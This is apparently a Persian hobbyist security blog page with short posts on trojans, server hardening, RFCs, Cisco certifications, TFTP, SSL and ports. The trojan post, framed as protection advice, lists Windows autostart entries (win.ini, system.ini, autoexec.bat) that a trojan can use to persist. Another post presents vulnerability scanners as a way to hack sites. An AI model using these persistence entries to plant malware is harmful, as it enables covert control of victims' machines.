خلیج تا ابد پارس میماند

      دوستان عزیزم توجه کنید گروه پارسه به هیچ عنوان به هیچ سایت یا آیدی و یا وبلاگ

حمله نمیکند لطفا درخواست نکنید ما هکر نیستیم.

      اطلاعات فقط در زمینه ی آموزش هستند.

این وبلاگ کاملا در راستای قانون وبلاگ نویسان فعالیت

                           می کند.

با سلام به شما دوستان و بازدید کنندگان محترم.بالاخره بعد از چند وقت تصمیم گرفتم یه سر به این بلاگ بزنم که دیدم توی قسمت نظرات کلی درخواست برای هک آیدی و وبلاگ و سایت گذاشتند.

نمیدونم بعضی ها چی فکر میکنند ...اولا اگر یه نفر بخواد هک کنه که یه جا نمیشینه شما ازش درخواست کنید یک نفر یا حقیقی یا حقوقی یه سازمان یه آیدی یه وبلاگ رو هک کنه.

مطمئن باشید اگر آدم عقده ایی نباشه این کار رو براتون نمیکنه یه هکر واقعی به قول یکی از دوستام که هکر (کلاه سفید) هست مثل یه سامورائی هستش هیچوقت به نا حق یا بی دلیل حمله نمیکنه.

هکر های کلاه سفید هم که کارشون هک کردن سیستم ها برای عیب یابی و تعیین ضریب نفوذ پذیری

اونهاست نه هک برای دزدی اطلاعات و غیره...

دوستان عزیز لطفا توجه کنید که هک کردن با دزدی و تجاوز به حریم خصوصی یه فرد کاملا برابر هست

شما وقتی یه نفر رو هک میکنی و میخوای اذیتش کنی دقیقا همون کاری رو داری انجام میدی که یه دزد وقتی از دیوار میره بالا انجامش میده.

هک رو باید از گروه هک آشیانه یاد گرفت در راستای حفظ آبروی کشور هک میکنن بدون هیچ ترسی.

اما کار ما شده اینکه دزدی کنیم اذیت کنیم حریص باشیم.البته خودم رو میگم به کسی جسارت نمیکنم

ببینید این رو هم بگم اگر شما یه جا دیدید که یه نفر میگه آیدی بده هک کنم برات آیدی خودت رو هم بده تا پسورد رو برات بذارم داخل ایمیلت یا یه همچین چرندیاتی مطمئن باشید یه کاسه زیر نیم کاسه هست.

هیچ وقت هک از راه مهندسی اجتماعی رو یادتون نره .پسوردتون رو  میگیرن هزار جور بلا سرتون میارن

مثلا میشه یه تروجان به یه آدرس ایمیل کرد.که معمولا به شکل یه فایل عکس ایمیل میکنند وقتی طرف اون رو باز میکنه  تروجان به طور مخفیانه نصب میشه روی سیستم شما وقتی آف میشید و بعدا آن میشید تمام پسوردهای روی سیستم رو براش ایمیل میکنه بهش میگه شما آن هستید و طرف همون لحظه آی پی شما رو  پیدا میکنه و پسورد ها رو هم که داره بهتون یه جوری حمله میکنه توی تاریخ جنگ ها نخونده باشید این از من ... ببینید من گفتم دیگه خودتون باید بگیرید.فعلا خداحافظ من برم خیلی اعصابم خرابه الان............

رمز نگاری : حملات متداول و راه حل های ممکن


مقدمه
ان از اینکه فقط کاربران مجاز،به اطلاعات حساس شرکت و یا ایمیل های شخصی خودشان دسترسی دارند میتوان کار چندان سادهای نباشد با توجه به این حقیقت که به طور متوسط هر کاربر باید حداقل 4الی 5 رمز را بخاطر بیاورد که برخی از این رمزها باید به طور ماهیانه نیز عوض شوند اکثریت کاربران به هنگام انتخاب و یا به خاطر آوردن یک رمز دچار ناامیدی میشوند و کاملا از عواقب کارهایشان به هنگام کنترل داده های حسابشان، ناگاه هستند.
این مقاله بر این ضرورت دارد که چقدر رمزهای امنیتی با وجود شکستنی بودنشان مهم و ضروری هستند همچنین روشهای مختلفی برای ایجاد و پشتیبانی از رمز ها بیان خواهد شد و متدهای جایگزینی ممکن برای این رمزها که به سه دسته Passphrases،Biomectrics وPKI(Public Key Infrastructure) تقسیم میشوند بررسی خواهد شد.
خطرات تحمیلی رمزها:

با وجود اینکه هنوز اکثریت سازمانها و تقریبا 99% کاربران خانگی ،به رمز ها به عنوان اصلی ترین شیوه کنترل منابع شخصی و حساس،وابسته هستند،اما ایجاد،پشتیبانی ناامن و انتقالات در طول شبکه میتواند درهای اطلاعات شخصی و یا سازمانی هر گروه یا دسته ای را بروی هکرها باز کند.
مدیرانی که هوز از الگوی قدیمی پیروی میکنند،فکر میکنند که ضروری ترین و ساده ترین روش برای شناسایی یک کاربر در یا پایگاه داده شان ،استفاده از رمز (Password)است اما حقیقت این است که کاربران با درک این نکته که لازم است ...

 

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

راه اندازي سرور وب تحت ويندوز و فراهم نمودن شرايط امنيتي لازم در مقابل نفوذگران

در اين مقاله سعي خواهم داشت در مورد راه اندازي يك وب سرور تحت ويندوز 2000 با IIS 5.0 را شرح دهم و هم چنين نكات لازم را جهت برقراري امنيت لازم در مقابل حفره هاي امنيتي شناخته شده و مهم را ارائه كنم ( من فرض را بر اين مي گيرم كه شما از قبل سرور IIS را بر روي سيستم نصب نموده ايد )


- شناخت ابزار هاي مديريتي

همان طور كه در شكل زير مشاهده مي كنيد ابزار هاي مديريتي ويندوز 2000 داراي قسمت هاي مختلفي ايست كه سعي مي كنم در مورد هر قسمت در اين بخش توضيحاتي مختصري ارائه كنم ...



تصوير 1 - ابزاري هاي مديريتي


Component Services

اين قسمت شامل مديريت و تنظيم نمودن برنامه هاي ...

 

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

مقدمه

در اين درس با RFC ها كه مراجعي تخصصي براي بدست آوردن اطلاعات جامع در زمينه شبكه هستند آشنا خواهيد شد



RFC چيست :

RFC سر نام عبارت Request For Comment و به معني درخواست براي توضيح مي باشد
RFC ها مراجعي بزرگ درباره مسائل مربوط به شبكه هستند كه هر كدام از آناه درباره موضوعي خاص نوشته شده و شماره مربوط به خود را دارند . به عنوان مثال RFC 768 پروتكل UDP را مورد برسي قرار مي دهد .
اين مراجع به صورت فايلهاي متني هستند كه بيشتر در قالب موضوعات تخصصي همچون تشريح پروتكل هاي مختلف و اينترنت منتشر مي شوند.

دسترسي به RFC ها :
RFC ها در برخي از سايت ها كه در زمينه ارائه آنها فعاليت مي كنند يافت مي شود . اين وب سايت ها مانند كتابخانه هايي هستند كه RFC ها را در خود جاي داده اند و براي دسترسي به RFC مورد نظر خود در آنها ، تنها نياز به شماره آن RFC داريم

ietf يكي از بهترين وب سايتها ست كه در اين زمينه فعاليت مي كند. شما مي توانيد با مراجعه به صفحه زير از سايت ietf و وارد كردن شماره RFC در باكس مورد نظر به راحتي به آن دسترسي پيدا كنيد

http://www.ietf.org/rfc.html

http://www.rfc-editor.org/rfcxx00.html


آيا تنها سازمانهاي استاندارد مي توانند RFC ها را تنظيم و ارائه كنند؟
تهيه و تنظيم RFC‌ها تنها به عهده ي سازمانهاي استاندارد مانند Internet Engineering Task Force نيست بلكه افراد عادي نيز مي توانند RFC هايي تهيه كرده و آنها را براي IETF بفرستند تا پس از برسي به RFC هاي ديگر اضافه شود


ليست RFC ها :

از آنجايي كه پيدا كردن يك RFC درباره موضوعي خاص كار مشكلي است ، ليستي از RFC هاي كاربردي و همه در آدرس زير براي شما فراهم شده است .




نكات مهم درس :
1- RFC‌ ها در زمينه ء فني نقش مهمي براي هر فرد كه بخواهد در ك عميقتري از TCP/IP داشته باشد محسوب مي شود.
2- RFC ها مراجعي بزرگ هستند كه تنها در صورت نياز به اطلاعات تخصصي به آنها مراجعه مي شود

مقدمه

با گسترش فرهنگ استفاده از كامپيوتر و راهيابي آن به ادارات، منازل، اين ابزار از حالت آكادميك و تحقيقاتي بدر آمد و مبدل به پاره اي از نيازهاي معمول زندگي شد. يكي از دستاوردهاي اين پيشرفت، ظهور شبكه اينترنت است كه به سرعت در كشورها توسعه يافته و به يك پديده اجتماعي مبدل گشته است.

اجتماع بزرگ كاربران اينترنت در سرتاسر دنيا از هر منطقه و نژادي كه باشند شامل افراد خوب و بد خواهند بود، عده اي در جهت كسب منافع براي خود و ديگران تلاش مي كنند و عده اي در جهت جذب منابع ديگران براي خود. با توجه به نو پا بودن اينترنت نمي توان انتظار داشت كه يك فرهنگ صحيح و غني بر آن حاكم شده باشد و لذا احتمال سرقت اطلاعات و يا دستكاري و انهدام آنها بنا به انگيزه هاي ناسالم، اهداف سياسي، جذب نامشروع ثروت مي رود.

اين مجموعه که قرار است بطور منظم در نشريه تخصصی IC منتشر گردد درباره چگونگي كار تروجان ها، انواع آنها و چگونگي تشخيص و مقابله با آنها به نكات مفيدي اشاره خواهد نمود. ضمناً در قسمت پاياني هر قسمت نيزآدرسهاي منابع تحقيق بصورت مستقيم در اختيار خواننده محترم قرار خواهد گرفت. همچنين علاقه مندان مي توانند براي دريافت اطلاعات بيشتر به سايت هاي معرفي شده مراجعه نموده و نرم افزارهاي مربوط را دريافت نمايند. ذکر اين نکته لازم است که به دليل گستردگي استفاده از سيستم عامل ويندوز در ايران، مطالب ارائه شده درباره تروجانهای تحت ويندوز می باشد.
يك Trojan Horse چيست؟

مي توان تعاريف زير را مطرح كرد:

يك برنامه ظاهراً بدون نويسنده يا به عبارتي با يك نويسنده غير مشخص که اعمال ناشناخته و حتي ناخواسته از طرف كاربر انجام دهد.

يك برنامه قانونی و معروف كه داخلش دگرگون شده است، بطوری که کدهای ناشناخته ای به آن اضافه گرديده و اعمال شناخته نشده اي بطور ناخواسته از طرف كاربر انجام مي دهند.

هر برنامه اي كه ظاهر مطلوب پسنديده اي به همراه برخي از اعمال مورد نياز داشته باشد بطوريكه كدهاي محقق شده اي كه از نظر كاربر مخفي است درون آن موجود مي باشد. يك سري اعمال نا شناخته و غير منتظره اي كه بطور حتم با نظر كاربر نبوده است را انجام مي دهد.

اسب تراوا نامي است كه از يك افسانه قديمي گرفته شده كه درباره چگونگي نفوذ يونانيان بر محل دشمنان خود از طريق ساختن يك اسب بزرگ و هديه دادن آن به دشمن كه نيروهايشان در داخل مجسمه اسب قرارگرفته بودند. هنگام شب سربازان يوناني اسب را شكستند و به دشمنانشان حمله نمودند و بطور كامل آنها غافلگير كردند و در جنگ فاتح ميدان شدند.


تروجان ها چگونه كار مي كنند؟

تروجان ها به دو قسمت تقسيم مي شوند. يك قسمت Client (خدمات گيرنده) و ديگری Server (خدمات دهنده). وقتي قرباني ندانسته قسمت Server را روي سيستم خودش اجرا مي كند. حمله كننده بوسيله قسمت Client با Server كه روي كامپيوتر قرباني است متصل مي شود و از آن پس مي تواند كنترل سيستم قرباني را در دست بگيرد . پروتكل TCP/IP كه استاندارد معمول براي برقراري ارتباطات است به اين تروجان آلوده ميشود و تروجان از طريق آن كارش را انجام مي دهد. البته لازم به ذكر است كه برخي اعمال تروجانها نيز از پروتكل UDP استفاده مي كنند. معمولاً زماني كه Server روي كامپيوتر قرباني اجرا مي شود. خود را در جايي از حافظه مخفي مي كند تا پيدا كردن يا تشخيص آن مشكل شود و به برخي درگاههاي خاص (Port) گوش مي دهد تا ببيند درخواست ارتباطي به سيستم از طرف حمله كننده آمده است يا نه، از طرفي رجيستري را نيز به گونه اي ويرايش مي كند كه برخي از اعمال بطور خودكار روي سيستم شروع به كار كنند.

براي نفوذ كننده لازم است كه IP قرباني را بداند براي اينكه بتواند به سيستم او متصل شود. اكثر قريب به اتفاق تروجانها بصورتي برنامه ريزي شده اند كه IP قرباني را براي حمله كننده ارسال مي كنند همانند سيستم پيغام گذار از طريق ICQ يا IRS . اين زماني اتفاق مي افتد كه قرباني IP ديناميك داشته باشد بدين معني كه هر زمان به اينترنت متصل ميشود و يك IP متفاوت از قبل داشته باشد كه اغلب سيستم هايي كه به روش dial- up به اينترنت متصل مي شوند از اين قانون پيروي مي كنند. كاربران ASDL معمولا IP هاي ثابت دارند به همين علت IP آلوده شده همواره براي حمله كننده شناخته شده است و اين حالت باعث تسهيل درامر اتصال به سيستم قرباني مي گردد.

اغلب تروجانها از روش شروع اتوماتيك استفاده مي كنند. بصورتي كه اگر شما كامپيوترتان را خاموش كنيد آنها قادر خواهند كه فعاليتهايشان را مجددا ً آغاز كنند و دسترسي لازم به حمله كننده را روي سيستم شما بدهند و ساختن تروجانها با قابليت شروع روشهايي هستند كه هميشه مورد استفاده قرار مي گيرند. يكي از اين روشها، محلق كردن تروجان به يك فايل اجرايي كه كاربرد زيادي دارد مي باشد، به عبارت ديگر محلق نمودن تروجان به يك برنامه پركاربرد ، موجب عملي شدن تفكرات حمله كننده خواهد شد. روشهاي شناخته شده نيز همانند دستكاري فايلهاي ريجستري ويندوز مي تواند به عملي شدن افكار حمله كننده بيانجامد. فايلهاي سيستمي ويندوز قرار دارند كه مي توانند بهترين انتخابهاي حمله كنندگان باشند.


به جهت اينکه دوستان بتوانند سيستم خود را در برابر اين حمله ها محافظت نمايند، قسمتهای مختلف ويندوز که می توان از آن استفاده نمود را در اينجا بررسی می کنيم.

پوشه شروع خودكار

پوشه اي كه بصورت خودكار در شروع كار ويندوز فراخواني مي شود و فايلهاي داخل آن بصورت اتوماتيك اجرا مي شوند در آدرس زير قرار دارند.


C:\ windows\ start Menu \ programs \startup



البته فرض براي اين است كه سيستم عامل ويندوز در درايو C و در شاخه windows نصب شده باشد.


فايل Win.ini

فرمت شروع خودكار در اين فايل بصورت زير مي باشد :


Load = Trojan.exe

Run = Trojan.exe




فايل System.ini

فرمت بكارگيري تروجان در اين فايل سيستمي بصورت زير است:


Shell = explorer.exe Trojan.exe



كه باعث مي شود بعد از هر بار اجراي Explorer فايل Trojan.exe اجرا شود.


فايل Wininit.ini

اين فايل توسط Setup.exe برنامه هاي نصب شوند مورد استفاده قرار مي گيرد.

بدين صورت كه يك بار اجرا شود، قابليت حذف خودكار را نيز دارد كه براي تروجان ها بسيار سهل مي باشد.


Winstart.bat

اين فايل دسته اي هم در ابتداي شروع به كار ويندوز فراخواني شده و فرامين داخل آن به ترتيب اجراي مي شوند كه تروجان مي تواند با افزودن خط زير خود را در حافظه بار كند.


@ Trojan.exe




فايل Autoexec.bat

اين فايل دسته اي هم از فايلهاي معروف فراخواني شده در ابتداي كار سيستم عامل مي باشد كه مي توان با دستكاري و اضافه نمودن خط زير بر آن تروجان مورد نظر را در سيستم قرباني اجرا نمود:


C:\ Trojan.exe




فايل Config.sys

اين فايل نيز از معروفترين فايلهاي پيكر بندي سيستم است و مي تواند در امر اجراي تروجان كاربرد داشته باشد.

براي هك كردن سايت بايد نقاط آسيب پذيري يا نقاط ضعف سيستم را تعيين كرد

برخي از ابزار هاي پويش و جستجو نقاط آسيب پذيري كه عبارتند از


Network associates Cybercop Scanner

http://www.pgp.com/products/Cybercop-scanner/default.asp

ISS ‘s internet Scanner http://iss.net/

Eeye ‘s Retian Scanner http://eeye.com/

Nessus, by Nessus project team http://Nessus.org/

و ...

Xx_parsa_xx

از بين تمام اين ابزارها Nessus ويژگي هاي زيادي دارد

1- كد برنامه نويسي آن در اختيار عموم است open

2- مي توان كدهاي لازم براي يك نقطه ضعف جديد را تعريف كنيم

3- اين ابزار رايگان است

4- تمام قابليت هاي nmap در Nessus وجود دارد

5- Nessus در linux و انواع ويندوز قابل نصب است

Nessus بيش از 500 نوع plug-in دارد

امكانات بعضي از plug-in ها

1- Finger abuses

اين plug-in بر روي اشكالات موجود در سرويس دهنده finger كه بطور معمول روي سيستم عامل unix قرار دارد تمركز مي كند

2- Windows

اين plug-in بر روي حملات به انواع سيستم عامل هاي مبتني بر ويندوز متمركز مي باشد

3- Ftp

اين plug-in نقاط آسيب پذيري سرويس دهنده هاي ftp را بررسي مي كند


4- backdoor

اين plug-in ويروسهاي تروا را بر روي ماشين هدف جستجو مي كند

5- Firewall

اين plug-in خطاهاي ديواره آتش را جستجو مي كند

6- gain root Remotrly

اين plug-in در جستجوي نقطه آسيب پذيري سيستم ها است كه آيا مي توان در سطح super-user به يك سيستم وارد شد

و بسياري از plug-in هاي ديگر به صورت مجاني

Nessus داري د و بخش است

1- Client 2- server

يكي از بهترين امكانات Nessus نوشتن plug-in توسط برنامه نويس و اضافه كردن آن است

كد هايي لازم را در C نوشته و به آ اضافه مي كنيم اين plug-in هاي نوشته

شده توسط يك API تعريف مي شود و در Nessus ينام NAPI

Application programming Interface) Nessus ( با پايگاه داده ها

و يا بقيه plug-ins ها ارتباط دارد
اين نرم افزار امكانات خيلي زياد ديگري دارد ...

در اين مقاله سعي خواهم داشت نكاتي را كه مديريان شبكه مي توانند در جهت بالا بردن امنيت سرورهاي خود مورد توجه قرار دهند را بيان كنم .


حذف برخي از Script Mapping ها

سرور اي-اي-اس از قبل جهت پشتيباني فايل هاي نظير ASP يا SHTML تنظيم شده است . هنگامي كه سرور درخواستي را مبتني بر اين فايل ها دريافت مي كند اين درخواست توسط يك DLL مورد انجام قرار مي گيرد كه در بسياري از موارد داراي حفره هاي امنيتي مي باشند كه دسترسي به سيستم را ميسر مي كند .

. Internet Services Manager را باز كنيد

2 . Properties را انتخاب كنيد

3 . WWW Service را انتخاب نموده و Edit را كليك كنيد

4 . در Configuration , HomeDirectory را انتخاب نماييد

اين اسكريپت مپينگ ها را ...

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

امنيت برتر در سرورهاي Apache
اين مقاله به صورت قدم به قدم به شما نحوه نصب و تنظيم نمودن وب سرورهاي آپاچي نسخه 1.3.x جهت امنيت بالاتر را نشان مي دهد كه سعي شده جزئيات كار به خوبي مورد بررسي قرار بگيرد .

قبل از اينكه ما مرحله امنيت وب سرور آپاچي را مورد بررسي قرار دهيم بايد اين را مشخص نماييم كه چه استفاده اي از سرور را خواهيم نمود . متنوع بودن استفاده از وب سرورهاي آپاچي نوشتن يك روند جهاني جهت امنيت اين سرور را بسيار مشكل مي سازد . به همين دليل است كه در اين مقاله ما چنين وب سروري با چنين شرايطي را در نظر مي گيريم :

اين وب سرور از طريق اينترنت قابل دسترسي است

فقط صفحات اچ-تي-ام-ال ثابت در آن قرار مي گيرد

اين سرور مكانيزم هاستينگ مجازي را پشتيباني خواهد نمود

صفحات مهم وب سايت فقط از طريق يك آدرس IP مخصوص و يا كاربران خاص مورد استفاده قرار مي گيرد ( basic authentication )

اين سرور همه درخواست هاي دريافتي را ضبط مي كند ( شامل اطلاعاتي در مورد مرورگرهاي وب نيز خواهد شد )

از اين جهت قابل تاكيد است كه كه مدل ذكر شده در بالا PHP, JSP, CGI و ديگر تكنولوژي هايي كه امكان تداخل با سرويس هاي وب سرور را دارد را پشتيباني نمي كند . استفاده از تكنولوژي هايي كه در بالا ذكر شد با اين كه در دنياي امروز مورد احتياج هسنتد ممكن است يك ريسك امنيتي بزرگ در امنيت باشد كه قابل ذكر است يك اسكريپت كوچك مي تواند امنيت سرور را به كلي كاهش دهد . ولي چرا ؟ بايد بگم اسكريپت هاي كاربردي ASP/CGI ممكن است داراي حفره هاي امنيتي ...

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

اگر تا به حال از ويندوز سرورNTيندوز سرور 2000استفاده كرده با شيد ، احتمالا متوجه شده ايد كه مايكرو سافت آنها را به صورت پيش فرض، غير ايمن طراحي كرده است . گرچه مايكروسافت و ساز و كارهاي امنيتي متعددي ايجاد كرده است ، اما نصب آنها به عهده كاربران است . اين در حالي است كه وقتي مايكرو سافت ويندوز 2003 را انتشارداد ، با اين كار ، فلسفه جديد اين است كه بايد به صورت پيش فرض ايمن باشد. به باشيد كلي اين ايده بسيار خوبي است ، اما مايكروسافت نتوانيد آن را به طور كامل پياده كند . با آن كه سرور بايد به طور كامل پياده كند . با آن كه ويندوز 2003 را انتشار داد ، با اين كار ، فلسفه خود را تغيير داد .

فلسفه جديد اين است كه سرور با يد به صورت پيش فرض ايمن باشد. به طور كلي اين ايده بسيار خوبي است ، اما مايكروسافت نتوانست آن را به طور كامل پياده كند . با آن كه ويندوز 2003 بدون شك ايمن تر از ويندوز NTيا ويندوز2000است ، اما هنوز هم نقصاني در آن ديده مي شود . در اينجا ما اعمال ساده اي را كه شما مي توانيد براي ايمن تر كردن ويندوز سرور 2003 انجام دهيد شرح مي دهيم .

نقش خود را بدانيد
شناخت نقش سروردر روند ايمن سازي بسيار حياتي است. نقش هاي متعددي وجود دارد كه ويندوز سرور ممكن است بر عهده داشته با شد .
براي مثال سرور ممكن است بر عهده داشته باشد . براي مثال ويندوز سرور 2003 ميتوانيد در نقش يك كنترل كننده دامنه ( domin Contoller ) ، يك سرور عضو ( member server )، سرور پايه( )سرور فايل ( )، سرور پرينت ( ) ، سرور پايانه ( ) و يا حالت هاي متعدد ديگر عمل كند. يك سرور همچنين مي تواند تركيبي از اين نقش ها را به عهده داشته باشد.
مشكل اينجاست كه سرئر در هر كدام از اين نقش ها ، نيازهاي امنيتي خاص خودش رادارد . براي مثال ، اگر قرار است كه سرور شما در نقش يك سرو ر IISكار كند ، شما بايد ...

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

- مدرک CCNP

CCNP مخفف عبارت Cisco Certified Network Professional است که معمولا افراد پس از گذراندن CCNA اقدام به گذراندن اين دوره CCNP می‌کنند. تفاوت عمده اين مدرک با CCNA اين است که فرد پس از گذراندن اين دوره توانائی شبکه‌بندی بين Nodeهای بيشتری ( از 100 نود تا 500 نود ) و افزوده شدن تعداد بيشتری پروتکلهای شبکه نظير PPP ,PSTN , ddr,x25 , isl ,isdn ,frame realy , ip , igrp , ipx, apple talk , rip,ip rip , vlsm , bgp , 802.10 , ospf , igrp دارد.


- ساير مدارک سيسکو

CCDA :
يکی ديگر از مدارک سيسکو که در ايران کمتر به آن توجه شده است، مدرک CCDA يا Cicso Certified Design Associate است. اين مدرک روی طراحی و مهندسی شبکه زوم نموده است.

CCDP :
مدرک CCDP يا Cicso Certified Design Professional يعنی طراح حرفه‌ای شبکه مورد تائيد سيسکو.

CCIE :
بعد از گذراندن CCDP، شما می‌توانيد مدرک CCIE را نيز اخذ کنيد. تفاوت اخذ اين مدرک با بقيه مدارک شرکت سيسکو در نحوه برگزاری آزمون آن می‌باشد، چون اين مدرک بصورت عملی و در لابراتوار برگزار می‌شود.



CCIP :
شرکت Cisco جديدا اقدام به برگزاری دوره CCIP نموده است که در آن بصورت محض روی مباحث IP , DSL پرداخته می‌شود .

اما سرفصل های آموزشی :
الف) پروتکلهای WAN :
- تشريح عملکرد PPP و بسته‌بندی داده‌ها در روترهای سيسکو
- استفاده از دستورات مناسب جهت نا هنجاريهای شبکه
- تشريح مفاهيم پايه‌ای Frame Relay و ويژيگی‌های آن
- پيکربندی MAPها و LMIها و Subinerface هاست
- تبيين پروتکلهای ISDN و Working Group و Channels و نقاط ارتجاع
- تفاوت ميان سرويسهای مهم WAN مانند LAPB , Frame Relay , DDR , PPP ,HDLC , ISDN/LAPD
- پيکربندی ISDN BRI و مسيريابی DDR
- بررسی مدل مرجع OSI و ارتباطات بين لايه‌ها
- بررسی مدل OSI با TCP/IP
- استفاده از مدل OSI بعنوان خطاياب شبکه (Network Troubleshooting )
- تطابق تجهيزات شبکه با لايه‌های مربوط در OSI
- تشريح نحوه کارکرد لايه‌های شبکه و علت پديد آمدن آنها
- بررسی عملکرد DATA ENCAPSULATION
- بررسی سرويسهای شبکه‌ای ....

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

همانطور که می‌دانيد شرکت Cisco بعنوان بزرگترين و معتبرترين شرکت در زمينه ساخت، طراحی و اجرای شبکه‌های کامپيوتری و تجهيزات آن در جهان شناخته شده است . از اين رو برای آشنائی بيشتر متخصصان شبکه با اصول طراحی و کار با تجهيزات، اين شرکت اقدام به برگزاری دوره‌های متعددی در زمينه‌های مختلف شبکه نموده است. همچنين برای آگاهی از صحت و کار آزمودگی دانش آموختگان اين دوره‌ها پس از گرفتن آزمون از آنها، به آنها مدرک بين‌المللی ارائه می‌نمايد .
در کشور ما شرکتها و موسسات آموزشی متعددی نسبت به برگزاری اين دوره ها اقدام نموده اند، ولی ...

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

TFTP خلاصه Trivial File Transfer Protocol است که بر روی پورت 69 کار می کند. تفاوت آن با FTP در اینست که FTP از TCP استفده می کند ولی TFTP ازUDP استفاده می کند که البته FTP دارای ثبات و اطمینان قابل قبولی هست در صورتی که TFTP سرعت را برای ما به ارمغان می آورد. نکته جالب توجه در این است که TFTP احتیاجی به پسورد ندارد.
جابجایی در اینجا بدین شکل است که client از server در خواست (نوشتن)write یا (خواندن)read می کند که معمولا همان درخواست Read (PRQ) مورد قبول واقع می شود و با قبول شدن در خواست از سوی سرور ارتباط میان آن دو بر قرار می گردد و جایجایی اطلاعات آغاز می گردد. در ترانسفر packet/block جابجایی تا 512بایت آنجام شده و سپس سرور منتظر جواب دریافت(ACK) از سوی کلاینت میشود و بعد از دریافت جواب دوباره 512 بایت یعدی را می فرستد و برای هر 512بایت این کار تکرار میشود .
هر یک از بلاک های دریافتی به انتهای بلاک قبلی متصل میشود اگر در این حین یکی از packet گم گردد هر دوی کلاینت و سرور یک time-out ایجاد نموده و...

به علت طولانی بودن در ادمه مطلب

ادامه مطلب

Layer , يا همان SSL يک تکنولوژی استاندارد و به ثبت رسيده برای تامين ارتباطی امن مابين يک وب سرور و يک مرورگر اينترنت است. اين ارتباط امن از تمامی اطلاعاتی که ما بين وب سرور و مرورگر اينترنت ( کاربر) انتقال ميابد , محافظت ميکند تا در اين انتقال به صورت محرمانه و دست نخورده باقی بماند. SSL يک استاندارد صنعتی است و توسط مليونها وب سايت در سراسر جهان برای برقراری امنتيت انتقال اطلاعات استفاده ميشود. برای اينکه يک وب سايت بتواند ارتباطی امن از نوع SSL را داشته باشد نياز به يک گواهينامه SSL دارد.

زمانيکه شما ميخواهيد SSL را بر روی سرور خود فعال کنيد سؤالات متعددی در مورد هويت سايت شما ( مانند آدرس سايت ) و همين طور هويت شرکت شما ( مانند نام شرکت و محل آن) از شما پرسيده ميشود. آنگاه سرور دو کليد رمز را برای شما توليد ميکند , يک کليد ...

به علت طولانی بودن در ادمه مطلب

ادامه مطلب

متون بسيار کامل ولی خشک و ثقيل که در مورد مفاهيم مختلف شبکه بحث می‌کنند. اين فايل‌ها به صورت متنی و با پسوند txt هستند و به‌عنوان مرجع (برای مراجعه و نه مطالعه کامل) کاربرد دارند. اين فايل‌ها يک‌بار منتشر شده و هرگز تغيير داده نمی‌شوند (حتی اگر حاوی اشتباه باشند.)


- فايل‌های RFC از کجا قابل دسترسی هستند؟

RFCها از سايت‌های بسياري قابل دسترس هستند ولی...

به علت طولانی بودن در ادمه مطلب

ادامه مطلب

PDA يا Personal Digital Assistant يك رايانه همراه و جيبي است كه از آن براي تنظيم و نگهداري برخي اطلاعات شخصي استفاده ميشود .

اين رايانه در حقيقت حكم دفترچه يادداشت شما را دارد. شما مي توانيد در اين رايانه فهرستي از كارهايي كه بايد انجام دهيد ، فهرست قرارها ، نام ها ، شماره تلفن ها و نشاني ها يي را كه مي خواهيد داشته باشيد ، ثبت و نگهداري كنيد .

اين رايانه به كوچكي يك كف دست است ، بنا براين براحتي در

 

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

امروز برایتان پورت را دسته بندی میکنم

قبلش با شما میخوام حرف حسلب بزنم اگر میخواهید هکر شید از این سایتها هیچی نسیبتان نمیشود دستبکار بشید برید برای یادگیری زبان c و++c

دسته بندي اول:

پورتهاي  ۰تا  ۱۰۲۳

مشهورترين پورتها هستند و معمولا هر کدام براي سرويس خاص استفاده ميشود مثلا پورت  ۲۱  جهت سرويس ftpو يا پورت  ۸۰جهت سرويس  html

پورتهاي  ۱۰۲۴  تا  ۴۹۱۵۱

اين سري از پورتها زماني استفاده ميشود که سيستم از يک ابزار شبکه در حال استفاده باشد مثل استفاده از outlook

پورتهاي  ۴۹۱۵۲  تا  ۶۵۵۳۵

اين سري از پورتها به ندرت استفاده ميشوند و معمولا توسط تروجانها باز شده و مورد استفاده قرار مي گيرد . اين تقسيم بندي ها هميشه بر قرار نبوده به همين خاطر به صورت ديگر نيز تقسيم ميشوند.

 

تقسيم دوم :

پورت هاي زير  ۱۰۲۴  و پورت هاي بالاي  ۱۰۲۴

 

چگونگي يافتن پورتهاي باز:

معمولا از برنامه هاي نوشته شده بنام پورت اسکنر ميتوان پورتهاي باز يک سيستم را پيدا کرد. معروفترين پورت اسکنر ها مثل nmapwin' .superscan . winscan . ipeye .ogre .retina.

از اسکنرهاي نام برده شده معمول دست هکرها nmapwin  و retina  ميباشد که در حال حاضر براي کار ما مناسب نيست.

 

نکته1: هيچ اسکنري به طور  ۱۰۰% جواب گوي نياز نمي باشد و من در پستهاي قبل يك برنامه گذاشتم براي دانلود.

 

نكته2: پورت هاي مهم را به ياد داشته باشيد : 7، 15، 21، 23، 25، 79،80،11

 درباره LinuxPH:

 LinuxPH نامی است که من برای این وب سایت انتخاب کرده ام. در اینجا شما نیاز به استفاده منحصرا از موس ندارید چون محیط کاربری این سیستم همانند terminal لینوکس می باشد.در طراحی وب سایت ها همواره بیشتر توجه بر روی استفاده از موس بوده است و برای دستیابی به قسمت های مختلف وب سایت ها تنها اشاره برروی کلید های موس کافی است در این بین استفاده از کی بورد بسیار کمرنگ بود این امر ما را در طراحی این سیستم منحصر بفرد روی وب مجاب کرد که نه تنها با استفاده از موس بلکه در کنار آن کی بورد هم نقش اساسی خود را نشان می دهد. مهمترین حسن استفاده از کی بود در LinuxPH دسترسی سریع و آسان به قسمت های مختلف وب سایت تنها با وارد کردن یک دستور چند حرفی می باشد. این قابلیت جدید امکان ایجاد بسیاری از قسمت های منحصر بفرد را روی این وب سایت ایجاد کرده که یکی از آنها شبیه سازی فضای ترمینال لینوکس و یا Hidden Commands است. مسلما چون این سیستم برای اولین باریست که طراحی شده است دارای مشکلاتی می باشد ولی آینده ی بسیار روشنی دارد و قابلیت های بسیار بزرگتری را میتوان به آن اضافه نمود.اگر شما توانایی برنامه نویسی تحت وب و یا حتی ایده ای جالبی برای گسترش این سیستم دارید حتما ما را در جریان آن قرار دهید یا با ما همکاری لازم را بکنید.

 

درباره برنامه نویس LinuxPH:

